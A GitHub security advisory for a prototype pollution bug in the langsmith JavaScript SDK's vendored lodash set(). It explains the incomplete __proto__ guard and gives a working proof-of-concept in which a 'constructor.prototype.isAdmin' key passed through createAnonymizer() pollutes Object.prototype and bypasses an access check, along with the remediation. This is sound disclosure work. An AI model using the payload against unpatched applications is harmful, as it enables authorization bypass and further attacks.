CVE-2026-40190
ADVISORY - githubSummary
GHSA-fw9q-39r9-c252: Prototype Pollution via Incomplete Lodash set() Guard in langsmith-sdk
Severity: Medium (CVSS ~5.6) Status: Fixed in 0.5.18
Summary
The LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process.
Affected Products
| Product | Affected Versions | Component |
|---|---|---|
langsmith (npm) |
<= 0.5.17 | js/src/utils/lodash/baseAssignValue.ts, js/src/anonymizer/index.ts |
| langchain-ai/langsmith-sdk | GitHub main branch (as of 2026-03-24) | JS/TypeScript SDK |
Not affected: The Python SDK (langsmith on PyPI) does not use lodash or an equivalent pattern.
Root Cause
The SDK vendors an internal copy of lodash's set() function at js/src/utils/lodash/. The baseAssignValue() function at baseAssignValue.ts:11 implements a guard for prototype pollution:
function baseAssignValue(object: Record<string, any>, key: string, value: any) {
if (key === "__proto__") {
Object.defineProperty(object, key, {
configurable: true, enumerable: true, value: value, writable: true,
});
} else {
object[key] = value; // ← No guard for "constructor" or "prototype" keys
}
}
This blocks __proto__ pollution but does not block the constructor.prototype traversal path. When set() is called with a path like "constructor.prototype.polluted":
castPath()splits it into["constructor", "prototype", "polluted"]baseSet()iterates:obj.constructor→Object→Object.prototypeassignValue(Object.prototype, "polluted", value)callsbaseAssignValue()- Key is
"polluted"(not"__proto__"), so the guard is bypassed Object.prototype.polluted = value— all objects are polluted
Attack Vector via Anonymizer
The createAnonymizer() API (importable as langsmith/anonymizer) processes data by:
- Extracting string nodes —
extractStringNodes()walks an object recursively and builds dotted paths from keys - Applying regex replacements — If a string value matches a configured pattern, the node is marked for update (
anonymizer/index.ts:95) - Writing back with
set()—set(mutateValue, node.path, node.value)writes the replaced value back (anonymizer/index.ts:123)
An attacker who controls keys in data being anonymized can construct a nested object where the path resolves to constructor.prototype.X:
{
wrapper: {
"constructor.prototype.isAdmin": "contains-secret-pattern"
}
}
extractStringNodes() produces path "wrapper.constructor.prototype.isAdmin". When the replacement triggers and set() writes back, it traverses up to Object.prototype.
Although createAnonymizer() uses deepClone() at anonymizer/index.ts:62 (JSON.parse(JSON.stringify(data))), the prototype chain traversal escapes the clone boundary because clone.wrapper.constructor resolves to the global Object constructor, not a cloned copy.
Proof of Concept
import { createAnonymizer } from "langsmith/anonymizer";
const anonymizer = createAnonymizer([
{ pattern: "secret", replace: "[REDACTED]" }
]);
console.log("BEFORE:", ({}).isAdmin); // undefined
const maliciousInput = {
wrapper: {
"constructor.prototype.isAdmin": "this-is-secret-data"
}
};
anonymizer(maliciousInput);
console.log("AFTER:", ({}).isAdmin); // "this-is-[REDACTED]-data"
console.log("Array:", [].isAdmin); // "this-is-[REDACTED]-data"
function checkAccess(user) {
if (user.isAdmin) return "ACCESS GRANTED";
return "ACCESS DENIED";
}
console.log(checkAccess({ name: "bob" })); // "ACCESS GRANTED" ← BYPASSED
Impact
Prototype pollution in a Node.js process can enable:
- Authentication bypass —
if (user.isAdmin)checks succeed on all objects - Remote Code Execution — Exploitable in template engines (Pug, EJS, Handlebars, Nunjucks) via polluted prototype properties that reach
eval()/Function()sinks - Denial of Service — Overwriting
toString,valueOf, orhasOwnPropertyon all objects - Data exfiltration — Polluting serialization methods to inject attacker-controlled values
Remediation
In baseAssignValue.ts, extend the guard to cover constructor and prototype keys:
function baseAssignValue(object, key, value) {
if (key === "__proto__" || key === "constructor" || key === "prototype") {
Object.defineProperty(object, key, {
configurable: true, enumerable: true, value, writable: true,
});
} else {
object[key] = value;
}
}
As defense in depth, extractStringNodes() in anonymizer/index.ts should also sanitize or reject path segments matching constructor or prototype before passing them to set().
Timeline
| Date | Event |
|---|---|
| 2026-03-24 | Initial report submitted |
| 2026-04-09 | Vendor confirmed; fixed in 0.5.18 |
Credits
Reported by: OneThing4101
GitHub
2.2
CVSS SCORE
5.6medium| Package | Type | OS Name | OS Version | Affected Ranges | Fix Versions |
|---|---|---|---|---|---|
| langsmith | npm | - | - | <=0.5.17 | 0.5.18 |
CVSS:3 Severity and metrics
The CVSS metrics represent different qualitative aspects of a vulnerability that impact the overall score, as defined by the CVSS Specification.
The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared physical (e.g., Bluetooth or IEEE 802.11) or logical (e.g., local IP subnet) network, or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN to an administrative network zone). One example of an Adjacent attack would be an ARP (IPv4) or neighbor discovery (IPv6) flood leading to a denial of service on the local LAN segment (e.g., CVE-2013-6014).
A successful attack depends on conditions beyond the attacker's control, requiring investing a measurable amount of effort in research, preparation, or execution against the vulnerable component before a successful attack.
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
The vulnerable system can be exploited without interaction from any user.
An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.
There is some loss of confidentiality. Access to some restricted information is obtained, but the attacker does not have control over what information is obtained, or the amount or kind of loss is limited. The information disclosure does not cause a direct, serious loss to the impacted component.
Modification of data is possible, but the attacker does not have control over the consequence of a modification, or the amount of modification is limited. The data modification does not have a direct, serious impact on the impacted component.
Performance is reduced or there are interruptions in resource availability. Even if repeated exploitation of the vulnerability is possible, the attacker does not have the ability to completely deny service to legitimate users. The resources in the impacted component are either partially available all of the time, or fully available only some of the time, but overall there is no direct, serious consequence to the impacted component.
NIST
2.2